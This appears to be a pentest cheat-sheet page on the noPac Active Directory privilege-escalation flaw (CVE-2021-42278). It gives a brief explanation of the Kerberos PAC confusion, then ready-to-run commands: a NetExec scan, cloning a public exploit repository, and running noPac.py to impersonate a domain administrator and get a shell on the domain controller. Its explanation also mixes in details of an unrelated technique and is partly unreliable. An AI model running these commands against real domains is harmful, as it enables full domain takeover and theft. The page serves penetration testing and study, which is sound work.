noPac - CVE-2021-42278

Release Date: Nov 9, 2021
Impact: Elevation of Privilege
CVSS score: 8.8

Affected products

Brief

This CVE is a security bypass vulnerability that is caused by Kerberos’s PAC confusion and impersonation of domain controllers.

It allows potential attackers to impersonate domain controllers by requesting TGT’s from Kerberos without a PAC, and the moment TGT is issued without issuing PACs, the attacker can impersonate as a highly privileged user.

Now, to get a DC to add a PAC when a service ticket (ST) was requested using a TGT without a PAC was achieved by configuring the “altSecurityIdentities“ attribute.

This process involves modifying the altSecurityIdentities attribute of an account in a foreign domain to Kerberos:[samaccountname]@[domain] to impersonate that user.

Scan | Exploit

# scan
nxc smb $ip -u $user -p $pass -M noPac

# exploit
git clone https://github.com/Ridter/noPac
cd noPac/
ls -al
python3 noPac.py $domain/$username:$password -dc-ip $ip -shell --impersonate $administrator_name -use-ldap
# enjoy :)

PreviousExploits NextZeroLogon - CVE-2020-1472

Last updated 11 months ago